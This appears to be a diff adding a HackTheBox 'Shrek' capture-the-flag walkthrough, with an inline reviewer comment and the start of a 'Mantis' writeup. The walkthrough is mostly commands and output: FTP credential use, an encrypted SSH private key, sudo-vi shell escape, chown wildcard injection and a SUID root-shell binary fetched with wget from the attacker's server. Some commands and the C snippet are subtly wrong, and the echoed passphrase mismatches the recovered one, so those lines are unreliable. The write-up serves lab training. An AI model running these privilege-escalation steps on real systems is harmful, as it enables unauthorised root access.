+ -rw-r--r-- 1 0 0 3072 Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ -rw-r--r-- 1 0 0 8192 Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
+ -rw-r--r-- 1 0 0 13312 Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ -rw-r--r-- 1 0 0 5120 Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
+ -rw-r--r-- 1 0 0 7168 Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
+ -rw-r--r-- 1 0 0 8192 Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
+ -rw-r--r-- 1 0 0 4096 Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
+ -rw-r--r-- 1 0 0 7598 Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
+ -rw-r--r-- 1 0 0 12288 Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
+ -rw-r--r-- 1 0 0 9216 Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
+ -rw-r--r-- 1 0 0 15360 Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
+ -rw-r--r-- 1 0 0 6144 Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ -rw-r--r-- 1 0 0 1766 Aug 16 2017 key
+
+
+We retrieve key which is an encrypted private ssh key:
+
+
+
+So instead of getting every file from the ftp service one by one, we'll just use wget:
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
+ → wget -r --user="donkey" --password="d0nk3y1337!" ftp://10.10.10.47/
+ --2020-08-14 12:25:21-- ftp://10.10.10.47/
+ => ‘10.10.10.47/.listing’
+ Connecting to 10.10.10.47:21... connected.
+ Logging in as donkey ... Logged in!
+ ==> SYST ... done. ==> PWD ... done.
+ ==> TYPE I ... done. ==> CWD not needed.
+ ==> PASV ... done. ==> LIST ... done.
+
+ [...]
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek]
+ → ls -lashR
+ .:
+ total 3.4M
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 .
+ 4.0K drwxr-xr-x 5 nothing nothing 4.0K Aug 14 11:58 ..
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 10.10.10.47
+ 4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 14 12:20 key
+ 3.4M -rw-r--r-- 1 nothing nothing 3.3M Aug 15 2017 'Smash Mouth - All Star.mp3'
+
+ ./10.10.10.47:
+ total 332K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Aug 14 12:25 .
+ 4.0K drwxr-xr-x 3 nothing nothing 4.0K Aug 14 12:25 ..
+ 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 0a935efe212d455eaba901f743e76a1f.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 129a5d725798449cbe35c14226c21ec8.txt
+ 12K -rw-r--r-- 1 nothing nothing 11K Aug 14 09:01 173224a539f74d5bbd78bd097884a445.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 1cf72311c8394b85bee71378452a0627.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2d0b3a4e22dc4043976529e9e450839d.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 35ed54b85fda4c728e28d043ceff403f.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 3896633fd0f44d5789df5366050ecc4f.txt
+ 16K -rw-r--r-- 1 nothing nothing 14K Aug 14 09:01 40c2e657bcc54c78be1986e9bb45886a.txt
+ 16K -rw-r--r-- 1 nothing nothing 16K Aug 14 09:01 4328526e95f2406d8af2428b92a3afa8.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 3.0K Aug 14 09:01 549fe668212042acbcc96af1758141a4.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 68b211ee5513471e8b7de17661d18a9d.txt
+ 16K -rw-r--r-- 1 nothing nothing 13K Aug 14 09:01 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 79947ab62f1a4b959b68ada2b7849ff2.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 7ef381dce26a488493df64b67f3db3cf.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 84644e19171e425d8ac6e6e7a1398c46.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 9c11f948f169414cb4d3cfb607850e58.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 5.0K Aug 14 09:01 a1127bfd922e43f0b0007b147c26e11e.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 a381c21f0e874439a1a634a940eaf4a9.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.0K Aug 14 09:01 b26e893ae4b84ca28872fc519c3803fc.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 8.0K Aug 14 09:01 b2edd39d22674696a56a7939af2ff917.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 4.0K Aug 14 09:01 bf22aa78874249a4a855995884f1daeb.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 7.5K Aug 14 09:01 d25fcf2994e14ebf990cf5b9f0b98691.txt
+ 12K -rw-r--r-- 1 nothing nothing 12K Aug 14 09:01 dddedeb00dee439a86f7ac4c583ec700.txt
+ 12K -rw-r--r-- 1 nothing nothing 9.0K Aug 14 09:01 e415d037bfb74c5fa6d0521ff662de8d.txt
+ 16K -rw-r--r-- 1 nothing nothing 15K Aug 14 09:01 e5598789c60b45cf9f821e130af3b70e.txt
+ 8.0K -rw-r--r-- 1 nothing nothing 6.0K Aug 14 09:01 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ 4.0K -rw-r--r-- 1 nothing nothing 1.8K Aug 16 2017 key
+
+
+
+The idea here is to check the wordcount with the wc command:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/0 ] [~/_HTB/Shrek/10.10.10.47]
+ → wc *.txt
+ 0 1 9216 0a935efe212d455eaba901f743e76a1f.txt
+ 0 1 7168 129a5d725798449cbe35c14226c21ec8.txt
+ 0 1 11264 173224a539f74d5bbd78bd097884a445.txt
+ 0 1 15360 1cf72311c8394b85bee71378452a0627.txt
+ 0 1 3072 2d0b3a4e22dc4043976529e9e450839d.txt
+ 0 1 3072 2fdfec98b6f54a4bb2c24492804ed23e.txt
+ 0 1 15360 3416a6f48fb7407e8bfa58ee7869b4c9.txt
+ 0 1 15360 35ed54b85fda4c728e28d043ceff403f.txt
+ 0 1 7168 3896633fd0f44d5789df5366050ecc4f.txt
+ 0 1 14336 40c2e657bcc54c78be1986e9bb45886a.txt
+ **0 3 15390 4328526e95f2406d8af2428b92a3afa8.txt**
+ 0 1 3072 549fe668212042acbcc96af1758141a4.txt
+ 0 1 6144 629ac3a5efe24adaa7b5172f8bda44ca.txt
+ 0 1 8192 631385a5a1ce4e46a206f0f0fbdc0808.txt
+ 0 1 6144 68b211ee5513471e8b7de17661d18a9d.txt
+ 0 1 13312 6aee99ecf1aa4ce78ee8d990e2c91e9a.txt
+ 0 1 15360 79947ab62f1a4b959b68ada2b7849ff2.txt
+ 0 1 5120 7ef381dce26a488493df64b67f3db3cf.txt
+ 0 1 5120 84644e19171e425d8ac6e6e7a1398c46.txt
+ 0 1 15360 9c11f948f169414cb4d3cfb607850e58.txt
+ 0 1 6144 9de89e29bdb64a5eb69f1a8f344cd85a.txt
+ 0 1 5120 a1127bfd922e43f0b0007b147c26e11e.txt
+ 0 1 7168 a381c21f0e874439a1a634a940eaf4a9.txt
+ 0 1 7168 b26e893ae4b84ca28872fc519c3803fc.txt
+ 0 1 8192 b2edd39d22674696a56a7939af2ff917.txt
+ 0 1 4096 bf22aa78874249a4a855995884f1daeb.txt
+ **0 3 7598 d25fcf2994e14ebf990cf5b9f0b98691.txt**
+ 0 1 12288 dddedeb00dee439a86f7ac4c583ec700.txt
+ 0 1 9216 e415d037bfb74c5fa6d0521ff662de8d.txt
+ 0 1 15360 e5598789c60b45cf9f821e130af3b70e.txt
+ 0 1 6144 f274007acbbb431185bc1fb3a1a8c5c0.txt
+ 0 35 283084 total
+
+
+
+Here 2 files stand out since they have 3 words each:
+
+
+
+The 2nd word in the first file gives us a username:
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → echo 'UHJpbmNlQ2hhcm1pbmc=' | base64 -d
+ PrinceCharming
+
+
+The 2nd file gives us binary data:
+
+
+
+In order to recover the password we have to guess that this is using ECC cryptography, and that we needed to use python3's seccure library:
+
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → sudo apt install python3-pip
+ [sudo] password for nothing:
+ Reading package lists... Done
+ Building dependency tree
+ Reading state information... Done
+ The following additional packages will be installed:
+ python-pip-whl python3-wheel
+ The following NEW packages will be installed:
+ python-pip-whl python3-pip python3-wheel
+ 0 upgraded, 3 newly installed, 0 to remove and 0 not upgraded.
+ Need to get 2,078 kB of archives.
+ After this operation, 3,329 kB of additional disk space will be used.
+ Do you want to continue? [Y/n] y
+ Get:1 http://archive-4.kali.org/kali kali-rolling/main amd64 python-pip-whl all 20.0.2-5kali1 [1,842 kB]
+ Get:2 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-wheel all 0.34.2-1 [24.0 kB]
+ Get:3 http://archive-4.kali.org/kali kali-rolling/main amd64 python3-pip all 20.0.2-5kali1 [211 kB]
+ Fetched 2,078 kB in 1s (1,746 kB/s)
+ Selecting previously unselected package python-pip-whl.
+ (Reading database ... 311886 files and directories currently installed.)
+ Preparing to unpack .../python-pip-whl_20.0.2-5kali1_all.deb ...
+ Unpacking python-pip-whl (20.0.2-5kali1) ...
+ Selecting previously unselected package python3-wheel.
+ Preparing to unpack .../python3-wheel_0.34.2-1_all.deb ...
+ Unpacking python3-wheel (0.34.2-1) ...
+ Selecting previously unselected package python3-pip.
+ Preparing to unpack .../python3-pip_20.0.2-5kali1_all.deb ...
+ Unpacking python3-pip (20.0.2-5kali1) ...
+ Setting up python3-wheel (0.34.2-1) ...
+ Setting up python-pip-whl (20.0.2-5kali1) ...
+ Setting up python3-pip (20.0.2-5kali1) ...
+ Processing triggers for man-db (2.9.3-2) ...
+ Processing triggers for kali-menu (2020.3.2) ...
+ Scanning processes...
+ Scanning processor microcode...
+ Scanning linux images...
+
+ Running kernel seems to be up-to-date.
+
+ The processor microcode seems to be up-to-date.
+
+ No services need to be restarted.
+
+ No containers need to be restarted.
+
+ No user sessions are running outdated binaries.
+
+ [ 10.10.14.8/23 ] [ /dev/pts/9 ] [~/_HTB/Shrek/10.10.10.47]
+ → pip3 install seccure
+ Collecting seccure
+ Downloading seccure-0.5.0.tar.gz (40 kB)
+ |████████████████████████████████| 40 kB 1.0 MB/s
+ Collecting gmpy2>=2
+ Downloading gmpy2-2.0.8.zip (280 kB)
+ |████████████████████████████████| 280 kB 2.0 MB/s
+ Collecting pycryptodome
+ Downloading pycryptodome-3.9.8-cp38-cp38-manylinux1_x86_64.whl (13.7 MB)
+ |████████████████████████████████| 13.7 MB 7.0 MB/s
+ Requirement already satisfied: six>=1.2 in /usr/lib/python3/dist-packages (from seccure) (1.15.0)
+ Building wheels for collected packages: seccure, gmpy2
+ Building wheel for seccure (setup.py) ... done
+ Created wheel for seccure: filename=seccure-0.5.0-py3-none-any.whl size=40750 sha256=99e3b0dbd16cb3c1eb87b2049ac5d24e70b803086078c97f634ba874f9b519b3
+
+
+Then we run it like so:
+
+
+ python3
+ Python 3.8.3rc1 (default, Aug 14 2020, 11:45:56)
+ [GCC 9.3.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> import seccure
+ >>> cipher = b'\x01\xd3\xe1\xf2\x17T \xd0\x8a\xd6\xe2\xbd\x9e\x9e~P(\xf7\xe9\xa5\xc1KT\x9aI\xdd\\!\x95t\xe1\xd6p\xaa"u2\xc2\x85F\x1e\xbc\x00\xb9\x17\x97\xb8\x0b\xc5y\xec>> password = b'PrinceCharming'
+ >>> seccure.decrypt(cipher, password)
+ b'The password for the ssh file is: shr3k1sb3st! and you have to ssh in as: sec\n'
+
+
+And there we have credentials! sec:shr3k1sb3st!
+
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → cat key
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: AES-128-CBC,94DC7309349E17F8ED6776ED69D6265A
+
+ rx7VJS6fzctpfTQ16y9M2CYG701eIh3nDQND+MSFAMSD8JiElqiIH7yA6TpXKPPx
+ A9gcxf1qlezc3XIhQpsLN9tLJpOxWYMniUo06/7k+2vWO6AzX27hVPRk1vk9OTWG
+ gRe856uaS8WfQ3XxehHNk1bu710HzBSwZn/XNbHsNo74Bpol8MTm2BTjvnuxnFY8
+ tvw53nbXMQffBmrwBTvc5aaCk/C0LfvemSxLAgAwMACNpbPmdw9NkUxRDbL/93Q1
+ ZYMlFxiXhLgFWQFdW/u2WURmOcIuAHd1V8gWIvY10IpH7o4nXaCI4D8PUmnIDt2N
+ k6Q3Znnfe8BrzFlD1NdG5SfHNdNUn5N9DROk0cZsL+D9e9bQb5CoyL2ioL9fEeRv
+ 4J5w2ZnIHStAez+Za11WGcZsW3jk2eXGPZiD99k5GcazWQ60dv5dUR6J5fkxaibi
+ unqmN2tDaKReT7aT4Im6pLUscN8t2w8dprgsD/EbMsPr0X/TqOShXXhMUhk/9SAY
+ 2Rvudp97fqYHugIch4lZdDpYS//KRwzO+wQOQARX0tJ0DJ++lY6WNM/BD6+HUk+v
+ 2c3ziM7DL4i7zhA0qnc8796Nxs8D/QTUWjmcNQhcOM4rAYsmyRqyoVe3ciadKWmk
+ vfwBJYxCwE9I9qUfZS3TsEYdbLE4MjlFB+Zn+fYpyA950hVFDxvu+E8zIcSYA0bJ
+ GAra2vH/xgmEoptYqeav/sstisJOYPW1Ui3K5C9E0QMH2MRReZoHlToCSNwUOWRo
+ rY1z3UZMyV5qw3VsuOk+n81P2npyP0RYo6xjAQW/1uN01LPi6y79j/3k9L35N7pH
+ vJHACTHa1bgCGkYGYm75DRIPYqJKs8g3htPHTbyfAfybeMBFQFxz3SBSWp8T9yjF
+ +WKUWQ2EmUtgC9n04tLf1/SIldvtOvtwyv2LiIzgvtT6DCMoulprRlb+U0iY1kbQ
+ lrpUhFtcK1SvC4Z6ebAEoX/jVRWKdbKldr35ECwIiMVNUFhvXwg4JRdmgmeeDga5
+ 66TSTqupISE7q6MuBfesQItkoiairO36enBvYdifN4/kRFBNXo1ZUTzdKVw6/UVo
+ n9tG9Fnk/z/Ee0iuT3PS0xtu6cBaXzFggm1n73honBjJzIJdtDAJ2AFSMJg6F6TJ
+ d0BPB0SGfF8rU+s0RjBhr1nE+px9qYKsuPAKkfi/b/EVa5WEacNezUTTKW9v9DjM
+ ym/zSi9GMDEczlFO2wthN5MXh0XNzUyQxDAcek1uZyaQd66NXQ0AywQG114+XLx8
+ 29sJvTuy6PXJs4ZUCno4/7RQnG9mwHtcV2f3ETASTjtsxBVotzfnpB22jgRND1fi
+ Ovqy0xbhRUrBhl8MjuE4Ha/ttoKvbDxC6PlVPMfjp3y2sTIDRp7HpAJfKoVMdJ5Y
+ 9FoWkWhrGkshGMIxyF3YE6cyhy8OOvmoEcNjyusCi1VWJpRxWU9Ml+GUH5gsjdAV
+ yiPvEG4LnM4gGeHhn9CZcrFJSYKIS0s+410YQvpECx09LaLBtq5y0QNkIspuKSPB
+ UDidMCyboqlc47D6SgNk7WQqut9tFj6PXE3chFFBHGfZ3hF9HnbUWBEiqyvOlAnm
+ -----END RSA PRIVATE KEY-----
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → chmod 600 key
+
+ [ 10.10.14.8/23 ] [ /dev/pts/1 ] [~/HTB/Shrek]
+ → ssh -i key sec@10.10.10.47
+ The authenticity of host '10.10.10.47 (10.10.10.47)' can't be established.
+ ECDSA key fingerprint is SHA256:elYdm7BTN0q3wYoaIdUyw1kBlMFTls2dWHgybMAYav8.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.47' (ECDSA) to the list of known hosts.
+ Enter passphrase for key 'key': shr3kisb3st!
+ Last login: Thu Oct 1 07:41:33 2020
+ [sec@shrek ~]$ id
+ uid=1000(sec) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
+ [sec@shrek ~]$ cat user.txt
+ d353869dc904f1f38d24fa118b397b19
+
+
+
+and we have the user flag!
+
+## **Part 3 : Getting Root Access**
+
+To get root access onto the box, we need to first privesc from the user sec to farquad:
+
+
+ [sec@shrek ~]$ sudo -l
+ User sec may run the following commands on shrek:
+ (farquad) NOPASSWD: /usr/bin/vi
+
+
+Get into vi using the user farquad using sudo -u:
+
+
+ [sec@shrek ~]$ sudo -u farquad vi
+
+
+Then type in **:!bash** to drop into a shell as farquad:
+
+
+
+ [farquad@shrek sec]$ id
+ uid=1001(farquad) gid=100(users) groups=100(users),7(lp),10(wheel),91(video),92(audio),93(optical),95(storage)
+
+ [farquad@shrek sec]$ cd ~
+ [farquad@shrek ~]$ ls
+ mirror
+ [farquad@shrek ~]$ ./mirror
+ Mirror, Mirror on the wall who is the most handsome of all?
+ Of course you Lord Farquad
+
+
+There we get a funny binary that mimics the mirror from the shrek movie, one may think this is a binexp challenge but when decompiled we see that it's a rabbit hole, since it prints the message and does nothing else. The idea here was to check out cronjobs (which we can guess from running pspy), which hints us towards a cronjob that is running every 5 minutes.
+
+
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1178 | /usr/bin/CROND -n
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1176 | /usr/bin/CROND -n
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1179 | /usr/bin/python /root/chown
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1180 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
+ 2020/08/14 08:50:19 CMD: UID=0 PID=1181 | /bin/sh -c cd /usr/src; /usr/bin/chown nobody:nobody *
+
+
+Farquaad's shell is kind of a rabbithole in itself, so back into sec's shell, we try to find files that were modified after the timestamps we find inside sec's home directory:
+
+
+ [sec@shrek ~]$ ls -lash
+ total 28K
+ 4.0K drwx------ 3 sec users 4.0K Aug 15 2017 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Aug 11 2017 ..
+ 0 -rw------- 1 root root 0 Aug 22 2017 .bash_history
+ 4.0K -rw-r--r-- 1 sec users 21 Feb 14 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 sec users 57 Feb 14 2017 .bash_profile
+ 4.0K -rw-r--r-- 1 sec users 141 Feb 14 2017 .bashrc
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 16 2017 .ssh
+ 4.0K -r--r--r-- 1 root root 33 Aug 22 2017 user.txt
+
+ [sec@shrek ~]$ find / -newermt 2017-08-20 ! -newermt 2017-08-24 -ls 2>/dev/null
+ 16385 4 drwxr-xr-x 46 root root 4096 Aug 21 2017 /etc
+ 18518 4 -rw-r--r-- 1 root root 6 Aug 23 2017 /etc/hostname
+ 27466 4 drwxr-xr-x 5 root root 4096 Aug 23 2017 /etc/netctl
+ 18515 4 -rw-r--r-- 1 root root 389 Aug 23 2017 /etc/netctl/static
+ 35103 8 -rw-r--r-- 1 root root 4606 Aug 21 2017 /etc/vsftpd.conf
+ 131506 4 drwxr-xr-x 4 root root 4096 Aug 23 2017 /etc/systemd/system
+ 138139 4 -rw-r--r-- 1 root root 196 Aug 23 2017 /etc/systemd/system/netctl@static.service
+ 131581 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /etc/systemd/system/multi-user.target.wants
+ 138140 0 lrwxrwxrwx 1 root root 41 Aug 23 2017 /etc/systemd/system/multi-user.target.wants/netctl@static.service -> /etc/systemd/system/netctl@static.service
+ 33988 4 -rw------- 1 root root 929 Aug 21 2017 /etc/shadow
+ 33931 4 -rw-r--r-- 1 root root 968 Aug 21 2017 /etc/passwd
+ 131255 4 drwxr-x--- 3 root root 4096 Aug 22 2017 /root
+ 17 4 -r--r--r-- 1 root root 33 Aug 22 2017 /home/sec/user.txt
+ 18 0 -rw------- 1 root root 0 Aug 22 2017 /home/sec/.bash_history
+ 131595 4 drwxr-xr-x 2 root root 4096 Aug 23 2017 /var/lib/dhcpcd
+ 138091 4 drwxr-xr-x 2 root root 4096 Aug 21 2017 /var/spool/cron
+ 138145 4 -rw------- 1 root root 97 Aug 22 2017 /var/spool/cron/root
+ 138108 8196 -rw-r----- 1 root systemd-journal 8388608 Aug 23 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/user-1001.journal
+ 138101 16388 -rw-r----- 1 root systemd-journal 16777216 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@00055747c657656c-ad9ea2c5440b64ec.journal~
+ 138138 8192 -rw-r----- 1 root systemd-journal 8388608 Aug 21 2017 /var/log/journal/84d230a047b241c6be827bd5ce531868/system@0005574ac144c200-f23de797a5b2e762.journal~
+ 137786 16 -rw------- 1 root utmp 15744 Aug 22 2017 /var/log/btmp.1
+ 131087 8 -rw------- 1 root root 7948 Aug 23 2017 /var/log/vsftpd.log.1
+ 137811 264656 -rw-r--r-- 1 root root 271001726 Aug 23 2017 /var/log/httpd/access_log.1
+ 137906 12 -rw-r--r-- 1 root root 9833 Aug 23 2017 /var/log/httpd/error_log.1
+ 2100 4 drwxr-xr-x 2 sec root 4096 Aug 23 2017 /usr/src
+ 20283 4 -rw-r--r-- 1 root root 91 Aug 22 2017 /usr/src/thoughts.txt
+
+
+Here we are hinted towards /usr/src/thoughts.txt, and by running pspy earlier we know that there is a cronjob being run against the /usr/src directory, therefore we can exploit the wildcard in the cronjob running **chown nobody:nobody *** there.
+
+
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:57 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+
+The idea here is that thoughts.txt is readable by sec, and yet is owned by root. We need to take advantage of chown's wildcard like so:
+
+
+ [sec@shrek src]$ touch -- -reference=thoughts.txt
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 14 10:59 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Aug 16 2017 ..
+ 0 -rw-r--r-- 1 sec users 0 Aug 14 10:59 '-reference=thoughts.txt'
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+
+Now we have created a file named "--reference=thoughts.txt" which will be passed as an arguement to chown when it is run. Once that's done, it's possible to create a binary and set it's SUID bit. After the task runs and showns the binary, it's possible to execute code as root, such as spawning a bash shell!
+
+
+ [terminal 1]
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → vim nihilist.c
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → cat nihilist.c
+ #include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****unistd.h>
+
+ int main( int argc, char *argv[] )
+ {
+ setreuid(0,0);
+ execve("/usr/bin/bash", NULL, NULL);
+ }
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → gcc nihilist.c -o privesc
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → ls -lash
+ total 36K
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Jul 7 13:06 .
+ 4.0K drwxr-xr-x 9 nothing nothing 4.0K Jul 7 12:36 ..
+ 4.0K -rw-r--r-- 1 nothing nothing 153 Jul 7 13:06 nihilist.c
+ 4.0K -rw------- 1 nothing nothing 1.8K Jul 7 12:39 key
+ 20K -rwxr-xr-x 1 nothing nothing 17K Jul 7 13:06 privesc
+
+ [ 10.10.14.8/23 ] [ /dev/pts/12 ] [~/HTB/Shrek]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [terminal 2]
+
+Now that's done we wait for the cronjob to run and we can :
+
+
+ [sec@shrek ~]$ cd /usr/src/
+ [sec@shrek src]$ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Aug 23 2017 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+ [sec@shrek src]$ wget http://10.10.14.8:9090/privesc
+ --2021-07-07 11:00:19-- http://10.10.14.8:9090/privesc
+ Connecting to 10.10.14.8:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 16656 (16K) [application/octet-stream]
+ Saving to: ‘privesc’
+
+ privesc 100%[======================================================================================================================================================================================>] 16.27K 35.8KB/s in 0.5s
+
+ 2021-07-07 11:00:20 (35.8 KB/s) - ‘privesc’ saved [16656/16656]
+
+ [sec@shrek src]$ chmod 4755 privesc
+
+ [sec@shrek src]$ touch -- --reference=thoughts.txt
+
+ [sec@shrek src]$ ls -lash
+ total 32K
+ 4.0K drwxr-xr-x 2 sec root 4.0K Jul 7 11:00 .
+ 4.0K drwxr-xr-x 8 sec root 4.0K Oct 1 2020 ..
+ 20K -rwsr-xr-x 1 sec users 17K Jul 7 10:48 privesc
+ 0 -rw-r--r-- 1 sec users 0 Jul 7 11:00 '--reference=thoughts.txt'
+ 4.0K -rw-r--r-- 1 root root 91 Aug 22 2017 thoughts.txt
+
+
+ [sec@shrek src]$ date
+ Wed Jul 7 11:01:26 UTC 2021
+
+ [sec@shrek src]$ date
+ Wed Jul 7 11:20:55 UTC 2021
+ [sec@shrek src]$ ls -lash privesc
+ 20K -rwsr-sr-x 1 root root 17K Jul 7 11:06 privesc
+ [sec@shrek src]$ ./privesc
+
+ bash-4.4# id
+ uid=0(root) gid=100(users) groups=100(users),10(wheel),95(storage),98(power)
+ bash-4.4# cat /root/root.txt
+ 27XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
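Review bot: the SSH step contradicts the secret recovered just before it: the decrypted message and the `sec:shr3k1sb3st!` line give `shr3k1sb3st!`, but the login transcript reads `Enter passphrase for key 'key': shr3kisb3st!`, so a reader who copies that line gets a failed login. ssh never echoes the passphrase, so that line was hand-edited; either correct it to `shr3k1sb3st!` or drop the echoed value. In the chown section, the first attempt `touch -- -reference=thoughts.txt` creates a file with a single leading dash (the following `ls` shows `'-reference=thoughts.txt'`), which chown would not parse as `--reference`; only the later `touch -- --reference=thoughts.txt` is right, so either delete the first attempt or add a sentence saying it was a typo. The C snippet is not compilable as shown because `#include <****stdio.h>` (and the two lines after it) carry markdown bold-escaping debris for `#include <stdio.h>`; and `execve("/usr/bin/bash", NULL, NULL)` passes a NULL argv, which Linux tolerates but which should be written with an explicit vector such as `char *argv[] = {"/usr/bin/bash", NULL};` so the behaviour does not depend on a kernel quirk. Smaller points: "arguement", "showns", "it's SUID bit" (its) and "Farquaad" vs the account name `farquad`; and user.txt is printed in full while root.txt is masked, so mask both for consistency.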
diff --git a/Hard/5.md b/Hard/5.md
new file mode 100644
index 0000000..3bd5e24
--- /dev/null
+++ b/Hard/5.md
@@ -0,0 +1,330 @@
+# Mantis Writeup
+
+
+
+## Introduction :
+
+Mantis is a hard windows box released back in September 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we start with nmap to scan for open ports, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
+
+
